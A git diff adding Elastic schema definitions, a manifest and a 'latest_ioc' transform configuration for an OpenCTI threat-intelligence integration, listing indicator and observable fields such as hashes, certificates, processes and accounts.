b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/ecs.yml 
@@ -0,0 +1,175 @@ +# Manually define these as a workaround for failing expected values validation +- name: threat.indicator.name + level: extended + type: keyword + description: The display name indicator in an UI friendly format +- name: threat.indicator.type + level: extended + type: keyword + description: Type of indicator as represented by Cyber Observable in STIX 2.1 or OpenCTI +# Additional file hash algorithms +- name: threat.indicator.file.hash.sha3_256 + type: keyword + description: SHA3-256 hash. +- name: threat.indicator.file.hash.sha3_512 + type: keyword + description: SHA3-512 hash. +# External ECS defintions, required by the transform +- external: ecs + name: ecs.version +- external: ecs + name: event.agent_id_status +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.dataset +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.type +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: tags +- external: ecs + name: threat.feed.dashboard_id +- external: ecs + name: threat.feed.description +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.feed.reference +- external: ecs + name: threat.indicator.as.number +- external: ecs + name: threat.indicator.as.organization.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.accessed +- external: ecs + name: threat.indicator.file.created +- external: ecs + name: threat.indicator.file.directory +- external: ecs + name: threat.indicator.file.drive_letter +- external: ecs + name: threat.indicator.file.extension +- external: ecs + 
name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.hash.sha384 +- external: ecs + name: threat.indicator.file.hash.sha512 +- external: ecs + name: threat.indicator.file.hash.ssdeep +- external: ecs + name: threat.indicator.file.hash.tlsh +- external: ecs + name: threat.indicator.file.mime_type +- external: ecs + name: threat.indicator.file.mtime +- external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.file.path +- external: ecs + name: threat.indicator.file.size +- external: ecs + name: threat.indicator.file.type +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.marking.tlp +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.port +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.reference +- external: ecs + name: threat.indicator.registry.data.bytes +- external: ecs + name: threat.indicator.registry.data.strings +- external: ecs + name: threat.indicator.registry.data.type +- external: ecs + name: threat.indicator.registry.hive +- external: ecs + name: threat.indicator.registry.key +- external: ecs + name: threat.indicator.registry.path +- external: ecs + name: threat.indicator.registry.value +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.extension +- external: ecs + name: threat.indicator.url.fragment +- external: ecs + name: threat.indicator.url.full +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.password +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.query +- external: ecs + name: threat.indicator.url.registered_domain +- external: ecs + name: 
threat.indicator.url.scheme +- external: ecs + name: threat.indicator.url.subdomain +- external: ecs + name: threat.indicator.url.top_level_domain +- external: ecs + name: threat.indicator.url.username +- external: ecs + name: threat.indicator.x509.alternative_names +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: threat.indicator.x509.public_key_algorithm +- external: ecs + name: threat.indicator.x509.public_key_exponent +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/opencti.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/opencti.yml new file mode 100644 index 00000000000..2b4f5d0ff2f --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/opencti.yml 
@@ -0,0 +1,1105 @@
+- name: opencti
+ type: group
+ description: Fields from OpenCTI.
+ fields:
+ - name: indicator
+ type: group
+ description: Indicator fields that don't fit into ECS.
+ fields:
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the indicator.
+ - name: is_inferred
+ type: boolean
+ description: Whether the indicator is inferred.
+ - name: revoked
+ type: boolean
+ description: Whether the indicator is revoked.
+ - name: lang
+ type: keyword
+ description: A language associated with the indicator record.
+ - name: pattern_type
+ type: keyword
+ description: The pattern language used in this indicator.
+ - name: pattern_version
+ type: keyword
+ description: The version of the pattern language used in this indicator.
+ - name: pattern
+ type: keyword
+ description: The detection pattern for this indicator, expressed as a STIX pattern or using another appropriate language such as SNORT, YARA, etc.
+ - name: valid_from
+ type: date
+ description: The time from which this indicator is considered a valid indicator of the behaviors it is related to or represents.
+ - name: valid_until
+ type: date
+ description: The time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents.
+ - name: invalid_or_revoked_from
+ type: date
+ description: A time from which this indicator should be considered invalid or revoked.
+ - name: score
+ type: long
+ description: An integer score for the indicator.
+ - name: detection
+ type: boolean
+ description: Whether the indicator has been detected.
+ - name: creator_identity_class
+ type: keyword
+ description: The type of the creator of this indicator (e.g. "organization").
+ - name: kill_chain_phase
+ type: keyword
+ description: The kill chain name and kill change phase name (e.g. "[mitre-attack] exfiltration").
+ - name: external_reference + type: group + description: Fields to describe an external reference. + fields: + - name: external_id + type: keyword + description: A non-STIX ID for a related record in an external system. + - name: source_name + type: keyword + description: The name of an external source of related records. + - name: url + type: keyword + description: A URL for a related record in an external system. + - name: description + type: keyword + description: A description for a related record in an external system. + - name: observables_count + type: long + description: The number of observables related to this indicator, which may exceed the number fetched. + - name: observable + type: group + description: Fields describing related observables. + fields: + - name: autonomous_system + type: group + description: Fields describing an autonomous system observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: number + type: long + description: The number assigned to the AS, typically by a Regional Internet Registry (RIR). + - name: name + type: keyword + description: The name of the AS. + - name: rir + type: keyword + description: The name of the Regional Internet Registry (RIR) that assigned the number to the AS. + - name: directory + type: group + description: Fields describing a directory observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. 
+ - name: value + type: keyword + description: The main value for the observable. + - name: path + type: keyword + description: The path, as originally observed, to the directory on the file system. + - name: path_enc + type: keyword + description: The observed encoding for the path, using the IANA character set registry. + - name: ctime + type: date + description: The date/time the directory was created. + - name: mtime + type: date + description: The date/time the directory was last written to/modified. + - name: atime + type: date + description: The date/time the directory was last accessed. + - name: domain_name + type: group + description: Fields describing a domain name observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of the domain name, using RFC1034, RFC5890. + - name: email_addr + type: group + description: Fields describing an email address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of the email address, using RFC5322. + - name: display_name + type: keyword + description: A single email display name, i.e., the name that is displayed to the human user of a mail application, using RFC5322. + - name: email_message + type: group + description: Fields describing an email message observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. 
+ - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: is_multipart + type: boolean + description: Indicates whether the email body contains multiple MIME parts. + - name: attribute_date + type: date + description: The date/time that the email message was sent. + - name: content_type + type: keyword + description: The value of the "Content-Type" header of the email message. + - name: message_id + type: keyword + description: The Message-ID field of the email message. + - name: subject + type: keyword + description: The subject of the email message. + - name: received_lines + type: keyword + description: One or more "Received" header fields that may be included in the email headers. + - name: body + type: keyword + description: A string containing the email body. + - name: email_mime_part_type + type: group + description: Fields describing an email MIME component type observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: body + type: keyword + description: The contents of the MIME part. + - name: content_type + type: keyword + description: The value of the "Content-Type" header field of the MIME part. + - name: content_disposition + type: keyword + description: The value of the "Content-Disposition" header field of the MIME part. + - name: artifact + type: group + description: Fields describing an artifact observable. 
+ fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: hash + type: group + description: Hashes for the contents of the url or the payload_bin. + fields: + - name: md5 + type: keyword + description: MD5 hash for the contents of the url or the payload_bin. + - name: sha1 + type: keyword + description: SHA1 hash for the contents of the url or the payload_bin. + - name: sha256 + type: keyword + description: SHA-256 hash for the contents of the url or the payload_bin. + - name: sha512 + type: keyword + description: SHA-512 hash for the contents of the url or the payload_bin. + - name: ssdeep + type: keyword + description: SSDEEP hash for the contents of the url or the payload_bin. + - name: tlsh + type: keyword + description: TLSH hash for the contents of the url or the payload_bin. + - name: sha3_256 + type: keyword + description: SHA3-256 hash for the contents of the url or the payload_bin. + - name: sha3_512 + type: keyword + description: SHA3-512 hash for the contents of the url or the payload_bin. + - name: mime_type + type: keyword + description: MIME type of the artifact, given as of the values defined in the Template column in the IANA media type registry, when feasible. + - name: payload_bin + type: keyword + description: The binary data contained in the artifact as a base64-encoded string. + - name: url + type: keyword + description: A valid URL that resolves to the unencoded content. + - name: encryption_algorithm + type: keyword + description: The type of encryption algorithm the binary data is encoded in, if the artifact is encrypted. 
+ - name: decryption_key + type: keyword + description: The decryption key for the encrypted binary data. + - name: additional_names + type: keyword + description: Additional names of the artifact. + - name: file + type: group + description: Fields describing a file observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: hash + type: group + description: Hashes for the file. + fields: + - name: md5 + type: keyword + description: MD5 hash for the file. + - name: sha1 + type: keyword + description: SHA1 hash for the file. + - name: sha256 + type: keyword + description: SHA-256 hash for the file. + - name: sha512 + type: keyword + description: SHA-512 hash for the file. + - name: ssdeep + type: keyword + description: SSDEEP hash for the file. + - name: tlsh + type: keyword + description: TLSH hash for the file. + - name: sha3_256 + type: keyword + description: SHA3-256 hash for the file. + - name: sha3_512 + type: keyword + description: SHA3-512 hash for the file. + - name: size + type: long + description: The size of the file, in bytes. + - name: name + type: keyword + description: The name of the file. + - name: name_enc + type: keyword + description: The observed encoding for the name of the file, using the IANA character set registry. + - name: magic_number_hex + type: keyword + description: The hexadecimal constant ("magic number") associated with a specific file format that corresponds to the file, if applicable. + - name: mime_type + type: keyword + description: MIME type of the file, given as of the values defined in the Template column in the IANA media type registry, when feasible. 
+ - name: ctime + type: date + description: The date/time the file was created. + - name: mtime + type: date + description: The date/time the file was last written to/modified. + - name: atime + type: date + description: The date/time the file was last accessed. + - name: additional_names + type: keyword + description: Additional names of the file. + - name: content + type: group + description: Fields describing the file's content. + fields: + - name: payload_bin + type: keyword + description: The binary data contained in the file as a base64-encoded string. + - name: url + type: keyword + description: A valid URL that resolves to the unencoded content. + - name: encryption_algorithm + type: keyword + description: The type of encryption algorithm the binary data is encoded in, if the file is encrypted. + - name: decryption_key + type: keyword + description: The decryption key for the encrypted binary data. + - name: x509_certificate + type: group + description: Fields describing an x509 certificate observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: hash + type: group + description: Hashes calculated for the entire contents of the certificate. + fields: + - name: md5 + type: keyword + description: MD5 hash calculated for the entire contents of the certificate. + - name: sha1 + type: keyword + description: SHA1 hash calculated for the entire contents of the certificate. + - name: sha256 + type: keyword + description: SHA-256 hash calculated for the entire contents of the certificate. + - name: sha512 + type: keyword + description: SHA-512 hash calculated for the entire contents of the certificate. 
+ - name: ssdeep + type: keyword + description: SSDEEP hash calculated for the entire contents of the certificate. + - name: tlsh + type: keyword + description: TLSH hash calculated for the entire contents of the certificate. + - name: sha3_256 + type: keyword + description: SHA3-256 hash calculated for the entire contents of the certificate. + - name: sha3_512 + type: keyword + description: SHA3-512 hash calculated for the entire contents of the certificate. + - name: is_self_signed + type: boolean + description: Whether the certificate is self-signed, i.e., whether it is signed by the same entity whose identity it certifies. + - name: version + type: keyword + description: The version of the encoded certificate. + - name: serial_number + type: keyword + description: The unique identifier for the certificate, as issued by a specific Certificate Authority. + - name: signature_algorithm + type: keyword + description: The name of the algorithm used to sign the certificate. + - name: issuer + type: keyword + description: The name of the Certificate Authority that issued the certificate. + - name: subject + type: keyword + description: The name of the entity associated with the public key stored in the subject public key field of the certificate. + - name: subject_public_key_algorithm + type: keyword + description: The name of the algorithm with which to encrypt data being sent to the subject. + - name: subject_public_key_modulus + type: keyword + description: The modulus portion of the subject’s public RSA key. + - name: subject_public_key_exponent + type: long + description: The exponent portion of the subject’s public RSA key, as an integer. + - name: validity_not_before + type: date + description: The date on which the certificate validity period begins. + - name: validity_not_after + type: date + description: The date on which the certificate validity period ends. 
+ - name: basic_constraints + type: keyword + description: A multi-valued extension which indicates whether a certificate is a CA certificate. + - name: name_constraints + type: keyword + description: A namespace within which all subject names in subsequent certificates in a certification path are located. + - name: policy_constraints + type: keyword + description: Any constraints on path validation for certificates issued to CAs. + - name: key_usage + type: keyword + description: A multi-valued extension consisting of a list of names of the permitted key usages. + - name: extended_key_usage + type: keyword + description: A list of usages indicating purposes for which the certificate public key can be used for. + - name: subject_key_identifier + type: keyword + description: The identifier that provides a means of identifying certificates that contain a particular public key. + - name: authority_key_identifier + type: keyword + description: The identifier that provides a means of identifying the public key corresponding to the private key used to sign a certificate. + - name: subject_alternative_name + type: keyword + description: The additional identities to be bound to the subject of the certificate. + - name: issuer_alternative_name + type: keyword + description: The additional identities to be bound to the issuer of the certificate. + - name: subject_directory_attributes + type: keyword + description: The identification attributes (e.g., nationality) of the subject. + - name: crl_distribution_points + type: keyword + description: How CRL information is obtained. + - name: inhibit_any_policy + type: keyword + description: The number of additional certificates that may appear in the path before anyPolicy is no longer permitted. + - name: private_key_usage_period_not_before + type: date + description: The date on which the validity period begins for the private key, if it is different from the validity period of the certificate. 
+ - name: private_key_usage_period_not_after + type: date + description: The date on which the validity period ends for the private key, if it is different from the validity period of the certificate. + - name: certificate_policies + type: keyword + description: A sequence of one or more policy information terms, each of which consists of an object identifier (OID) and optional qualifiers. + - name: policy_mappings + type: keyword + description: One or more pairs of OIDs; each pair includes an issuerDomainPolicy and a subjectDomainPolicy. + - name: ipv4_addr + type: group + description: Fields describing an IPv4 address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The values of one or more IPv4 addresses expressed using CIDR notation. + - name: ipv6_addr + type: group + description: Fields describing an IPv6 address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The values of one or more IPv6 addresses expressed using CIDR notation. + - name: mac_addr + type: group + description: Fields describing a mac address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. 
+ - name: value + type: keyword + description: The value of a single MAC address. + - name: mutex + type: group + description: Fields describing a mutex observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: name + type: keyword + description: The name of the mutex object. + - name: network_traffic + type: group + description: Fields describing a network traffic observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: start + type: date + description: The date/time the network traffic was initiated, if known. + - name: end + type: date + description: The date/time the network traffic ended, if known. + - name: is_active + type: boolean + description: Indicates whether the network traffic is still ongoing. + - name: src_port + type: long + description: The source port used in the network traffic, as an integer. + - name: dst_port + type: long + description: The destination port used in the network traffic, as an integer. + - name: protocols + type: keyword + description: The protocols observed in the network traffic, along with their corresponding state. + - name: src_byte_count + type: long + description: The number of bytes, as a positive integer, sent from the source to the destination. 
+ - name: dst_byte_count + type: long + description: The number of bytes, as a positive integer, sent from the destination to the source. + - name: src_packets + type: long + description: The number of packets, as a positive integer, sent from the source to the destination. + - name: dst_packets + type: long + description: The number of packets, as a positive integer, sent from the destination to the source. + - name: process + type: group + description: Fields describing a process observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: is_hidden + type: boolean + description: Whether the process is hidden. + - name: pid + type: long + description: The Process ID, or PID, of the process. + - name: created_time + type: date + description: The date/time at which the process was created. + - name: cwd + type: keyword + description: The current working directory of the process. + - name: description + type: keyword + description: Description of the process. + - name: command_line + type: keyword + description: The full command line used in executing the process, including the process name and any arguments. + - name: environment_variables + type: keyword + description: The list of environment variables associated with the process. + - name: aslr_enabled + type: boolean + description: Whether Address Space Layout Randomization (ASLR) is enabled for the process (on Windows). + - name: dep_enabled + type: boolean + description: Whether Data Execution Prevention (DEP) is enabled for the process (on Windows). + - name: priority + type: keyword + description: The current priority class of the process in Windows. 
+ - name: owner_sid + type: keyword + description: The Security ID (SID) value of the owner of the process (on Windows). + - name: window_title + type: keyword + description: The title of the main window of the process (on Windows). + - name: startup_info + type: flattened + description: The STARTUP_INFO struct used by the process (on Windows). + - name: integrity_level + type: keyword + description: The Windows integrity level, or trustworthiness, of the process. + - name: service_name + type: keyword + description: The name of the (Windows) service. + - name: descriptions + type: keyword + description: The descriptions defined for the (Windows) service. + - name: display_name + type: keyword + description: The display name of the service in Windows GUI controls. + - name: group_name + type: keyword + description: The name of the load ordering group of which the (Windows) service is a member. + - name: start_type + type: keyword + description: The start options defined for the (Windows) service. + - name: service_type + type: keyword + description: The DLLs loaded by the (Windows) service, as a reference to one or more File objects. + - name: service_status + type: keyword + description: The type of the (Windows) service. + - name: service_dll + type: group + description: Fields describing a service DLL. + fields: + - name: hash + type: group + description: Hashes for the service DLL file. + fields: + - name: md5 + type: keyword + description: MD5 hash for the service DLL file. + - name: sha1 + type: keyword + description: SHA1 hash for the service DLL file. + - name: sha256 + type: keyword + description: SHA-256 hash for the service DLL file. + - name: sha512 + type: keyword + description: SHA-512 hash for the service DLL file. + - name: ssdeep + type: keyword + description: SSDEEP hash for the service DLL file. + - name: tlsh + type: keyword + description: TLSH hash for the service DLL file. 
+ - name: sha3_256 + type: keyword + description: SHA3-256 hash for the service DLL file. + - name: sha3_512 + type: keyword + description: SHA3-512 hash for the service DLL file. + - name: size + type: long + description: The size of the service DLL file, in bytes. + - name: name + type: keyword + description: The name of the service DLL file. + - name: name_enc + type: keyword + description: The observed encoding for the name of the service DLL file, using the IANA character set registry. + - name: magic_number_hex + type: keyword + description: The hexadecimal constant ("magic number") associated with a specific file format that corresponds to the service DLL file, if applicable. + - name: mime_type + type: keyword + description: MIME type of the service DLL file, given as of the values defined in the Template column in the IANA media type registry, when feasible. + - name: ctime + type: date + description: The date/time the service DLL file was created. + - name: mtime + type: date + description: The date/time the service DLL file was last written to/modified. + - name: atime + type: date + description: The date/time the service DLL file was last accessed. + - name: additional_names + type: keyword + description: Additional names of the service DLL file. + - name: content + type: group + description: Fields describing service DLL file content. + fields: + - name: payload_bin + type: keyword + description: The binary data contained in the service DLL file as a base64-encoded string. + - name: url + type: keyword + description: A valid URL that resolves to the unencoded content of the service DLL file. + - name: encryption_algorithm + type: keyword + description: The type of encryption algorithm the binary data is encoded in, if the service DLL file is encrypted. + - name: decryption_key + type: keyword + description: The decryption key for the encrypted binary data of the service DLL file. 
+ - name: software + type: group + description: Fields describing a software observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: name + type: keyword + description: The name of the software. + - name: cpe + type: keyword + description: The Common Platform Enumeration (CPE) entry for the software, if available. + - name: swid + type: keyword + description: The Software Identification (SWID) Tags entry for the software, if available. + - name: languages + type: keyword + description: The languages supported by the software, using RFC5646. + - name: vendor + type: keyword + description: The name of the vendor of the software. + - name: version + type: keyword + description: The version of the software. + - name: url + type: group + description: Fields describing a URL observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of the URL, using RFC3986. + - name: user_account + type: group + description: Fields describing a user account observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. 
+ - name: value + type: keyword + description: The main value for the observable. + - name: user_id + type: keyword + description: The identifier of the account and may be a numeric ID, a GUID, an account name, an email address, etc. + - name: credential + type: keyword + description: A cleartext credential, not PII. + - name: account_login + type: keyword + description: The account login string, where it differs from the user_id. + - name: account_type + type: keyword + description: The type of the account. + - name: display_name + type: keyword + description: The display name of the account, to be shown in user interfaces, if applicable. + - name: is_service_account + type: boolean + description: Indicates that the account is associated with a network service or system process (daemon), not a specific individual. + - name: is_privileged + type: boolean + description: That the account has elevated privileges. + - name: can_escalate_privs + type: boolean + description: That the account has the ability to escalate privileges. + - name: is_disabled + type: boolean + description: If the account is disabled. + - name: account_created + type: date + description: When the account was created. + - name: account_expires + type: date + description: The expiration date of the account. + - name: credential_last_changed + type: date + description: When the account credential was last changed. + - name: account_first_login + type: date + description: When the account was first accessed. + - name: account_last_login + type: date + description: When the account was last accessed. + - name: windows_registry_key + type: group + description: Fields describing a Windows registry key observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. 
+ - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: attribute_key + type: keyword + description: The full registry key including the hive. + - name: modified_time + type: date + description: The last date/time that the registry key was modified. + - name: number_of_subkeys + type: long + description: The number of subkeys contained under the registry key. + - name: windows_registry_value_type + type: group + description: Fields describing a Windows registry value type observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: name + type: keyword + description: The name of the registry value. + - name: data + type: keyword + description: The data contained in the registry value. + - name: data_type + type: keyword + description: The registry (REG_*) data type used in the registry value. + - name: cryptographic_key + type: group + description: Fields describing a cryptographic key observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: A cryptographic key. + - name: cryptocurrency_wallet + type: group + description: Fields describing a cryptocurrency wallet observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. 
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: A cryptocurrency wallet ID.
+ - name: hostname
+ type: group
+ description: Fields describing a hostname observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: A hostname.
+ - name: text
+ type: group
+ description: Fields describing a text observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: Text.
+ - name: user_agent
+ type: group
+ description: Fields describing a user agent observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: An HTTP User-Agent string.
+ - name: bank_account
+ type: group
+ description: Fields describing a bank account observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: The main value for the observable.
+ - name: iban
+ type: keyword
+ description: An International Bank Account Number (IBAN).
+ - name: bic
+ type: keyword
+ description: A Bank Identifier Code (BIC).
+ - name: account_number
+ type: keyword
+ description: A bank account number.
+ - name: phone_number
+ type: group
+ description: Fields describing a phone number observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: A phone number.
+ - name: payment_card
+ type: group
+ description: Fields describing a payment card observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: The main value for the observable.
+ - name: card_number
+ type: keyword
+ description: A payment card number.
+ - name: expiration_date
+ type: date
+ description: A payment card expiration date.
+ - name: cvv
+ type: keyword
+ description: A Card Verification Value (CVV) for a payment card.
+ - name: holder_name
+ type: long
+ description: The name of a payment card holder.
+ - name: media_content
+ type: group
+ description: Fields describing a media content observable.
+ fields:
+ - name: id
+ type: keyword
+ description: The ID of the observable in OpenCTI.
+ - name: standard_id
+ type: keyword
+ description: A predictable STIX ID, generated based on one or multiple attributes of the observable.
+ - name: entity_type
+ type: keyword
+ description: The observable type.
+ - name: value
+ type: keyword
+ description: The main value for the observable.
+ - name: title
+ type: keyword
+ description: The title of an item of media content.
+ - name: content
+ type: keyword
+ description: The content of an item of media content.
+ - name: media_category
+ type: keyword
+ description: The category of an item of media content.
+ - name: url
+ type: keyword
+ description: The URL of an item of media content.
+ - name: publication_date
+ type: date
+ description: The publication date of an item of media content.
diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/manifest.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f5296fd0c0a
--- /dev/null
+++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+start: true
+destination_index_template:
+ settings:
+ index:
+ sort:
+ field:
+ - "@timestamp"
+ order:
+ - desc
+ mappings:
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ match_mapping_type: string
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ date_detection: false
diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/transform.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/transform.yml
new file mode 100644
index 00000000000..6ba5cee4db5
--- /dev/null
+++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/transform.yml
@@ -0,0 +1,37 @@
+# Use of "*" to use all namespaces defined.
+source:
+ index:
+ - "logs-ti_opencti.indicator-*"
+# The version suffix on the dest.index should be incremented if a breaking
+# change is made to the index mapping. You must also bump the
+# fleet_transform_version for any change to this transform configuration to
+# take effect. The old destination index is not automatically removed. We are
+# dependent on https://github.com/elastic/package-spec/issues/523 to give us
+# that ability in order to prevent having duplicate IoC data and prevent query
+# time field type conflicts.
+dest:
+ index: "logs-ti_opencti_latest.dest_indicator-1"
+ aliases:
+ - alias: "logs-ti_opencti_latest.indicator"
+ move_on_creation: true
+latest:
+ unique_key:
+ - event.id
+ sort: "event.ingested"
